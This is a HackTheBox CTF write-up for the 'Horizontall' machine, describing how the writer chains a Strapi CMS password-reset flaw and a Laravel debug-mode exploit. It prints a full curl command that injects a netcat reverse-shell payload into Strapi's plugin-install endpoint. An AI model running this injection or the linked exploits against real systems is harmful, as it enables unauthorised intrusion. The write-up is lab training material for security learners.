CTF-Writeups/HackTheBox/Horizontall.md

HackTheBox-Horizontall

NMAP

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                            
|   2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA) 
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDL2qJTqj1aoxBGb8yWIN4UJwFs4/UgDEutp3aiL2/6yV2iE78YjGzfU74VKlTRvJZWBwDmIOosOBNl9nfmEzXerD0g5lD5SporBx06eWX/XP
2sQSEKbsqkr7Qb4ncvU8CvDR6yGHxmBT8WGgaQsA2ViVjiqAdlUDmLoT2qA3GeLBQgS41e+TysTpzWlY7z/rf/u0uj/C3kbixSB/upkWoqGyorDtFoaGGvWet/q7j5Tq061MaR6cM2CrYcQxxnPy
4LqFE3MouLklBXfmNovryI0qVFMki7Cc3hfXz6BmKppCzMUPs8VgtNgdcGywIU/Nq1aiGQfATneqDD2GBXLjzV
|   256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIyw6WbPVzY28EbBOZ4zWcikpu/CPcklbTUwvrPou4dCG4koataOo/RDg4MJuQP+sR937/ugmI
NBJNsYC8F7jN0=
|   256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJqmDVbv9RjhlUzOMmw3SrGPaiDBgdZ9QZ2cKM49jzYB
80/tcp open  http    syn-ack ttl 63 nginx 1.14.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

When visit the web server it's going to redirect us to horizontall.htb so let's add this in /etc/hots file

We can see from the icon on title bar it's from Vue.js which is a javascript framework. At the bottom of the web page we can see a contact form

But on clicking the send button it doesn't do anything

I tried to poke around the website manually but didn't find anything so ran nikto scan but it didn't showed anything interesting other than nginx version which we already saw from nmap scan

Tried fuzzing for files using gobuster and ffuf but they failed as the connection was timing out whenever I ran the tool again to look for any subdomains but it failed so I tired to look around in javascript files

This javascript file gave us a subdomain so let's add and see where it takes

From wappalyzer results it seems this is scrapi cms so search for any vulnerabilties I saw synack listed some we can also verify the version for strapi

Version is 3.0.0-beta.17.4 so we are on the right track

Let's try visting the link

Here it asks us for the admin credentials so let's try admin:admin but this failed , going back to vulnerabilites page we can see Improper Access Control , there's a flaw in javascript files which doesn't properly handle password resets so we can reset the password of any user in this case "admin".

So I found a python script after goolging for password reset which can reset a user's password by supplying a vaid username , the IP address and the new password which we want to set

And we are in the admin panel

Now focusing on getting a rce I found another article related to it

curl -i -s -k -X $'POST' -H $'Host: localhost:1337' -H $'Authorization: Bearer [jwt]' -H $'Content-Type: application/json' -H $'Origin: http://localhost:1337' -H $'Content-Length: 123' -H $'Connection: close' --data $'{\"plugin\":\"documentation && $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f)\",\"port\":\"1337\"}' $'http://localhost:1337/admin/plugins/install'

Here we need to use the jwt token which got after password reset so we need to use it there

I used --proxy as I was getting bad request error because at then end of json } was missing so I added that in burp suite and got a shell

Stabilize the shell with python3

If we take a look at local ports with ss -tulpn (socket status) , we'll see two local ports on which a web page is running

The web page on port 1337 is the one we saw api-prod subdomain so , we'll need port forawrd 8000 , we can do this through ssh local port forwarding by including our public key in authroized_keys file so we can login with our private key

Let's try to do port forwarding through ssh

This shows us the laravel version so there must be a CVE for this as well, we can check if the laravel applicaiton is running in debugging mode by visiting /profiles

Perfect now by following the way to exploit deubg mode to get remote code execution

Clone these two repositories

First we'll going to make a file with ls command being executed than run that PHAR file against the python script

And the rce works so now we can get a reverse shell by including the netcat payload

References

• https://thatsn0tmysite.wordpress.com/2019/11/15/x05/
• https://bittherapy.net/post/strapi-framework-remote-code-execution/
• https://github.com/ambionics/laravel-exploits
• https://github.com/ambionics/phpggc.git
• https://www.ambionics.io/blog/laravel-debug-rce